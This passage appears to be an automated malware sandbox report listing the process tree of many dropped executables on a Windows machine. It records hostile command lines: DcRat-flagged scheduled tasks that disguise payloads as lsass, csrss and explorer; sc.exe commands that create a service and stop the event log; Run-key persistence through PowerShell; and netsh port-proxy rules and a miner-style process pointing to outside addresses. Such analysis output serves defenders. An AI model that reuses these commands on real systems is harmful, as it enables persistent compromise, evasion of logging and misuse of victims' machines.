                                          "schtasks" /create /tn "WSUS Update Client" /sc ONLOGON /tr "C:\Windows\SysWOW64\SubDir\asg.exe" /rl HIGHEST /f
                                          4⤵
                                          • DcRat
                                          • Creates scheduled task(s)
                                          PID:3836
                                    • C:\Users\Admin\AppData\Local\Temp\Files\redline1234.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\redline1234.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:4852
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe delete "ACULXOBT"
                                        3⤵
                                        • Launches sc.exe
                                        PID:2520
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe create "ACULXOBT" binpath= "C:\ProgramData\hlkwogclqprr\uwgxswmtctao.exe" start= "auto"
                                        3⤵
                                        • Launches sc.exe
                                        PID:4328
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe start "ACULXOBT"
                                        3⤵
                                        • Launches sc.exe
                                        PID:3208
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop eventlog
                                        3⤵
                                        • Launches sc.exe
                                        PID:4584
                                    • C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
                                      "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1956
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        3⤵
                                          PID:1568
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_institute';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Tests_for_preparation_for_the_institute' -Value '"C:\Users\Admin\AppData\Local\Tests_for_preparation_for_the_institute\Tests_for_preparation_for_the_institute.exe"' -PropertyType 'String'
                                          3⤵
                                            PID:4748
                                        • C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:2356
                                          • C:\Users\Admin\AppData\Local\Temp\Files\build2.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Files\build2.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:2396
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 2192
                                              4⤵
                                              • Program crash
                                              PID:3052
                                        • C:\Users\Admin\AppData\Local\Temp\Files\workforroc.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Files\workforroc.exe"
                                          2⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:1240
                                          • C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe
                                            "C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:1388
                                          • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
                                            "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:852
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1240 -s 1512
                                            3⤵
                                            • Program crash
                                            PID:4004
                                        • C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Files\%40Natsu338_alice.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:3816
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                            3⤵
                                              PID:3080
                                          • C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Files\$77_loader.exe"
                                            2⤵
                                            • Sets file execution options in registry
                                            • Executes dropped EXE
                                            PID:680
                                            • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
                                              "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bfyxb7xj.cmdline"
                                              3⤵
                                                PID:2892
                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
                                                  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAED0.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCAECF.tmp"
                                                  4⤵
                                                    PID:4280
                                                • C:\Windows\system32\chcp.com
                                                  "C:\Windows\system32\chcp.com" 437
                                                  3⤵
                                                    PID:1348
                                                  • C:\Windows\system32\netsh.exe
                                                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                    3⤵
                                                      PID:2336
                                                    • C:\Windows\system32\NETSTAT.EXE
                                                      "C:\Windows\system32\NETSTAT.EXE" -na
                                                      3⤵
                                                      • Gathers network information
                                                      PID:2528
                                                    • C:\Windows\system32\NETSTAT.EXE
                                                      "C:\Windows\system32\NETSTAT.EXE" -na
                                                      3⤵
                                                      • Gathers network information
                                                      PID:3540
                                                    • C:\Windows\system32\netsh.exe
                                                      "C:\Windows\system32\netsh.exe" interface portproxy reset
                                                      3⤵
                                                        PID:2620
                                                      • C:\Windows\system32\NETSTAT.EXE
                                                        "C:\Windows\system32\NETSTAT.EXE" -na
                                                        3⤵
                                                        • Gathers network information
                                                        PID:1176
                                                      • C:\Windows\system32\netsh.exe
                                                        "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                        3⤵
                                                          PID:1760
                                                        • C:\Windows\system32\netsh.exe
                                                          "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=5.133.65.53
                                                          3⤵
                                                            PID:4128
                                                          • C:\Windows\system32\netsh.exe
                                                            "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                            3⤵
                                                              PID:1464
                                                            • C:\Windows\system32\netsh.exe
                                                              "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                              3⤵
                                                                PID:4656
                                                              • C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Files\$77_oracle.exe" -o 5.133.65.54:80 --tls --http-port 888 -t 1
                                                                3⤵
                                                                  PID:1264
                                                                • C:\Windows\system32\netsh.exe
                                                                  "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                                  3⤵
                                                                    PID:1348
                                                                  • C:\Windows\system32\NETSTAT.EXE
                                                                    "C:\Windows\system32\NETSTAT.EXE" -na
                                                                    3⤵
                                                                    • Gathers network information
                                                                    PID:3540
                                                                  • C:\Windows\system32\NETSTAT.EXE
                                                                    "C:\Windows\system32\NETSTAT.EXE" -na
                                                                    3⤵
                                                                    • Gathers network information
                                                                    PID:3052
                                                                  • C:\Windows\system32\NETSTAT.EXE
                                                                    "C:\Windows\system32\NETSTAT.EXE" -na
                                                                    3⤵
                                                                    • Gathers network information
                                                                    PID:1932
                                                                  • C:\Windows\system32\netsh.exe
                                                                    "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                                    3⤵
                                                                      PID:3488
                                                                    • C:\Windows\system32\netsh.exe
                                                                      "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
                                                                      3⤵
                                                                        PID:4880
                                                                      • C:\Windows\system32\netsh.exe
                                                                        "C:\Windows\system32\netsh.exe" interface portproxy show all
                                                                        3⤵
                                                                          PID:1272
                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\1230.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\1230.exe"
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        PID:4728
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\SysWOW64\cmd.exe
                                                                      1⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:2336
                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
                                                                        2⤵
                                                                          PID:4640
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1360 -ip 1360
                                                                        1⤵
                                                                          PID:4268
                                                                        • C:\Windows\SysWOW64\chcp.com
                                                                          chcp 1251
                                                                          1⤵
                                                                            PID:4684
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1360 -ip 1360
                                                                            1⤵
                                                                              PID:4944
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                                                                              1⤵
                                                                              • DcRat
                                                                              • Creates scheduled task(s)
                                                                              PID:452
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1360 -ip 1360
                                                                              1⤵
                                                                                PID:2300
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1360 -ip 1360
                                                                                1⤵
                                                                                  PID:3204
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1360 -ip 1360
                                                                                  1⤵
                                                                                    PID:3384
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1360 -ip 1360
                                                                                    1⤵
                                                                                      PID:2628
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 1360 -ip 1360
                                                                                      1⤵
                                                                                        PID:4636
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1360 -ip 1360
                                                                                        1⤵
                                                                                          PID:1912
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1360 -ip 1360
                                                                                          1⤵
                                                                                            PID:4500
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1360 -ip 1360
                                                                                            1⤵
                                                                                              PID:2292
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1360 -ip 1360
                                                                                              1⤵
                                                                                                PID:452
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1360 -ip 1360
                                                                                                1⤵
                                                                                                  PID:2900
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1360 -ip 1360
                                                                                                  1⤵
                                                                                                    PID:3572
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1360 -ip 1360
                                                                                                    1⤵
                                                                                                      PID:100
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1360 -ip 1360
                                                                                                      1⤵
                                                                                                        PID:4152
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1360 -ip 1360
                                                                                                        1⤵
                                                                                                          PID:2852
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1360 -ip 1360
                                                                                                          1⤵
                                                                                                            PID:4020
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1360 -ip 1360
                                                                                                            1⤵
                                                                                                              PID:1800
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1360 -ip 1360
                                                                                                              1⤵
                                                                                                                PID:5012
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Windows\System32\F12\de-DE\lsass.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2528
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\F12\de-DE\lsass.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:4636
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Windows\System32\F12\de-DE\lsass.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:776
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Videos\explorer.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:988
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Admin\Videos\explorer.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:1912
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Videos\explorer.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:4552
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:1180
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:3432
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft\Temp\EU677F.tmp\fontdrvhost.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:1844
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\odt\csrss.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:3340
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2252
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\odt\csrss.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5012
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "pixelcloudnew2p" /sc MINUTE /mo 13 /tr "'C:\odt\pixelcloudnew2.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:5032
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "pixelcloudnew2" /sc ONLOGON /tr "'C:\odt\pixelcloudnew2.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:1940
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "pixelcloudnew2p" /sc MINUTE /mo 12 /tr "'C:\odt\pixelcloudnew2.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2428
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:1576
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "winhostDhcp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:2000
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
                                                                                                                1⤵
                                                                                                                • DcRat
                                                                                                                • Process spawned unexpected child process
                                                                                                                • Creates scheduled task(s)
                                                                                                                PID:776
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 852 -ip 852
                                                                                                                1⤵
                                                                                                                  PID:3796
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1336 -ip 1336
                                                                                                                  1⤵
                                                                                                                    PID:3836
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1336 -ip 1336
                                                                                                                    1⤵
                                                                                                                      PID:4988
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1336 -ip 1336
                                                                                                                      1⤵
                                                                                                                        PID:3424
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 1336
                                                                                                                        1⤵
                                                                                                                          PID:2380
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1336 -ip 1336
                                                                                                                          1⤵
                                                                                                                            PID:1940
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1336 -ip 1336
                                                                                                                            1⤵
                                                                                                                              PID:3216
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1336 -ip 1336
                                                                                                                              1⤵
                                                                                                                                PID:1576
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1336 -ip 1336
                                                                                                                                1⤵
                                                                                                                                  PID:2968
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1336 -ip 1336
                                                                                                                                  1⤵
                                                                                                                                    PID:3640
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DABB.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\DABB.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:3700
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 348
                                                                                                                                      2⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:2292
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3700 -ip 3700
                                                                                                                                    1⤵
                                                                                                                                      PID:4692
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\ED3A.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\ED3A.exe
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                      PID:2676
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ED3A.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ED3A.exe
                                                                                                                                        2⤵
                                                                                                                                        • Checks computer location settings
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        PID:4732
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "C:\Users\Admin\AppData\Local\66636179-2e9a-4a3b-b05e-f46de5886a87" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                          3⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:2560
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\ED3A.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\ED3A.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                          3⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:3364
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\ED3A.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\ED3A.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                            4⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3756
                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 568
                                                                                                                                              5⤵
                                                                                                                                              • Program crash
                                                                                                                                              PID:2988
                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 3756 -ip 3756
                                                                                                                                      1⤵
                                                                                                                                        PID:4964
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\70D.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\70D.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:2060
                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                            2⤵
                                                                                                                                              PID:3992
                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                              2⤵
                                                                                                                                                PID:3776
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\D38.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\D38.exe
                                                                                                                                              1⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              PID:4344
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:2984
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                  PID:2060
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1F5A.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1F5A.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:2076
                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
                                                                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4780
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2988
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2080 -ip 2080
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4460
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2516
                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2080 -ip 2080
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4592
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2080 -ip 2080
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2804
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
                                                                                                                                                              1⤵
                                                                                                                                                                PID:1268
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2080 -ip 2080
                                                                                                                                                                1⤵
                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                PID:4288
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2080 -ip 2080
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:3384
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:2076
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2080 -ip 2080
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2948
                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2080 -ip 2080
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4036
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1956
                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2080 -ip 2080
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:4040
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
